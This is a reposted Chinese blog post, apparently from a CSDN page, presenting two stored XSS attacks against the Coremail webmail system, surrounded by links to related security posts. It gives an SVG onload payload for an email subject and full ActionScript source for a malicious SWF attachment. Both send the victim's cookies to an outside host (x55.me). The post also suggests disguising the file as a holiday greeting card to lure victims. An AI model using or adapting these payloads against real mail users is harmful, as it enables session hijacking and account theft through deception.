Coremail邮件系统存储型XSS两个

最新推荐文章于 2024-11-09 09:49:14 发布
最新推荐文章于 2024-11-09 09:49:14 发布
阅读量452 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: php
原文链接:http://www.cnblogs.com/hookjoy/p/4039540.html
本文介绍两种针对Coremail邮件系统的存储型XSS攻击方式:通过SVG标签和特制SWF文件窃取受害者Cookies。SVG方法利用了邮件正文中的恶意代码,而SWF文件则作为附件发送,两者均可在受害者查看邮件或附件时实施攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

(1):Coremail邮件系统存储型XSS之一

给受害者发送主题如下的邮件:

<svg onload='img=new Image();img.src="//x55.me/geo.php?get="+document.cookie;'>



当受害者试图打开邮件时,cookie将会被窃取:




(2):Coremail邮件系统存储型XSS之二

将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf):

swf文件的AS代码如下(将就着看吧,东拼西凑整出来的):



package {

    import flash.external.ExternalInterface;

    import flash.display.Sprite;

    import flash.display.Sprite;

    import flash.events.Event;

    import flash.net.URLLoader;

    import flash.net.URLRequest;

    import flash.text.TextField;

    import flash.text.TextFieldAutoSize;

    import flash.xml.*;

    import flash.events.IOErrorEvent;

    import flash.events.*;

    import flash.net.*;

    /**

     * @author User

     */



    



     public class csrf extends Sprite {

        

        private var loader:URLLoader;

        public function csrf() {

            var res:String = ExternalInterface.call("function(){return document.cookie;}");

            doGet(res);

        }

        

        private function doGet(res:String):void{

            loader = new URLLoader();

            var target:String = "http://x55.me/geo.php?get="+res;

            var request:URLRequest = new URLRequest(target);

            try {

                loader.load(request);

            } catch (error:Error) {

                sendDatatoJS("Error: " + error.getStackTrace());

            }

        }

        

        private function sendDatatoJS(data:String):void{

            trace(data);

            ExternalInterface.call("colsole.log", data);

        }

    }

    

    

}

 

一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点。

转载于:https://www.cnblogs.com/hookjoy/p/4039540.html

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1551
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
AnyMacro邮件系统SQL注入漏洞和XSS漏洞
kingjxust的专栏
01-22 4219
AnyMacro邮件系统在早期版本的用户登录处存在SQL注入漏洞,通过漏洞可爆出用户加密后的密码: 在用户名处输入 ' 号后 将提示错误: Query DB [select crypt, status from user where id = '' @mail.doamin.cn'] err:You have an error in your SQL syntax; check the man
Coremail手机版页面持久XSS实践
乐枕的家
05-01 2888
0x00 前言学校的邮箱是号称7亿用户都在用的Coremail邮箱系统. 利用这个漏洞,我们可以在一些条件下直接进入邮箱.这个持久XSS是王欢学长在上个暑假发现的,欢哥喜欢从小鸭子们身上收获编程的灵感,偷偷的告诉大家他的微信号:qqwanghuan0x01 描述当我们使用手机访问mail.bjtu.edu.cn登录时,会跳转到手机版的登录界面.0x02 详情这个XSS发生的位置就是"发件人"的位
【漏洞学习——XSS】Protonmail的存储XSS漏洞
Fly_鹏程万里
03-07 824
大家好,这篇文章我将分享在Protonmail的Web端发现两个严重漏洞。 漏洞1:暴力破解 我在注册了邮箱服务,测试了一些IDOR攻击,虽然没发现什么漏洞,但我在HTTP请求中发现了用来重置密码的10数字码!因此,我可以通过暴力破解来非法重置用户密码。 漏洞2:存储XSS 我还在Protonmail电子邮件编写页面中发现了一个存储XSS,并且只要向其他用户发送构造好的邮件就可...
搭建XSS Cookie 邮件接收
weujie
07-25 1262
初接触这行学习时,无非觉得Xss就是alert及script钓鱼,(以至于我还是那么菜)以至于没怎么展开学习,现如今随着学习的深入后,发现Xss的世界是如此的有意思; 缘由是在网上找了很多在线平台,发现邮件功能都没法使用,也不知道是我钓鱼还是网站钓鱼;( 没办法只能自己搭建一个。 搭建XSS Cookie 邮件接收+端口映射环境0x01 下载0x02 邮件服务配置0x03 sandmail 配置0x04 php配置0x05 代码0x06 映射端口 环境 环境 :phpstudy、Windos、花生壳、.
基于PHP的SquirrelMailphp邮件系统源码.zip
08-28
基于PHP的SquirrelMailphp邮件系统源码.zip
QQ邮箱反射xss漏洞
Coisini的博客
06-13 3206
……,对,我印象中写过了,刚才因为需要要用,搜索了一下,是空的,嘶嘶嘶~可怕~ 起因 甲方“一个人的安全部”的时候,一个研发的同事在设计一项报表功能时,因为受到邮箱的安全限制无法很好的实现,于是将情况反馈给我。说实话,我对浏览器的安全也不太了解,案头的书翻了几页就没再动过,于是对比了腾讯邮箱的做法,发现了这个xss。 背景 公司使用coremail搭建企业邮箱,开发做了一个通过邮件发送h...
2021 HW 漏洞清单汇总 ( 附 poc )
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
从零开始学习网络安全渗透测试之信息收集篇——(一)Web应用&企业产权&指纹识别&域名资产&网络空间&威胁情报&源码泄漏&开源闭源&指纹识别&GIT&SVN&DS&备份
love6a6的博客
08-14 1939
明确目标之后,我们要对目标的信息进行收集,有时候甲方进行授权时,给我们的信息很少,刁难你一下,比如就给你一个IP地址,让你自己找一下我们有多少域名、IP地址、对外资产信息有哪些等等,我们就需要自行模拟黑客攻击流程,对企业的各类信息进行收集,其实不管是企业也好,还是你自己个人也好,想要测试某个网站的安全性,都要对这个网站的各类信息进行收集。
世爵php程序源码
10-16
此程序为最新版本,完美无错节,进过多次升级优化,功能完善,界面优美,操作简易,系统安全稳定的程序。
Coremail邮件系统 2.11.3
10-04
Coremail闪电邮客户端软件是一款优秀的国产电子邮件客户端,是为企业用户打造的企业级邮件客户端软件。提供独创的Coremail私有邮件协议,同时支持POP3、IMAP邮箱协议;可同时管理多个
Coremail企业管理使用手册
10-24
Coremail企业管理 本文档版权归盈世信息科技(北京)有限公司所有,并保留一切权利
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 4376
1.安全公告2019年6月14,Coremail发布了3个高危漏洞的安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和存在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露的漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露的漏洞、反射XSS、路径遍历、...
Coremail接口存配置读取漏洞POC
Sylon的博客
06-14 1万+
Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大企业,都有了Coremail的客户。 截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、...
【亲测免费】 Coremail邮件系统组织通讯录一键导出脚本使用教程
gitblog_00409的博客
08-31 1457
???? Coremail邮件系统组织通讯录一键导出脚本使用教程 1. 项目介绍 此项目**Coremail-address-book** 是一个专为Coremail邮件系统设计的开源工具,用于一键导出组织通讯录。它简化了从Coremail系统中提取完整组织联系人信息的过程,包括姓名、电子邮件地址、手机号码、公司电话等。通过该脚本,用户能够轻松获取到组织内部所有成员的详细联系方式,便于管理和备份。 2....
SMTP电子邮件格式及源码解析
热门推荐
Fly2Leo的专栏
08-28 2万+
SMTP协议之电子邮件格式 以下是使用FOXMAIL接收邮件后,得到的邮件源码,包括正文和两个附件(.JPG, .TXT): ---------------------------------------------------------------- 以下部分为邮件服务器添加的邮件头 -----------------------------------------------
Coremail论客客户端界面升级,打造安全办公新风向
Coremail论客
04-02 605
“我们希望通过本次界面的全新升级,为用户打造一个更加安全、高效的办公环境。在‘即时通讯+电子邮件客户端’的新模式下,将即时通讯功能与电子邮件功能紧密联系在一起,让商务办公不再受限制。“ 电子邮件作为目前互联网应用最为广泛的通讯工具,在企业的办公应用中有着不可替代的作用。而近年来,随着更多办公应用的入局,即时通讯亦然成为最受欢迎的办公软件,本次Coremail论客结合电子邮件客户端与即时通讯客户端...
邮件服务器源码实战:构建收发邮件系统
最新发布
weixin_42629522的博客
11-09 1537
本文还有配套的精品资源,点击获取 简介:邮件服务器是处理电子邮件的关键网络组件,负责发送、接收和存储邮件。本项目提供一套完整的邮件服务器源码,包括SMTP和POP3/IMAP协议实现,垃圾邮件过滤,安全性,数据库集成,多线程和并发处理等核心功能。学习和掌握这些代码,将有助于深入理解电子邮件系统的运作,为进行邮件服务器的开发和优化打下坚实基础。 1. 邮件服务器工作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值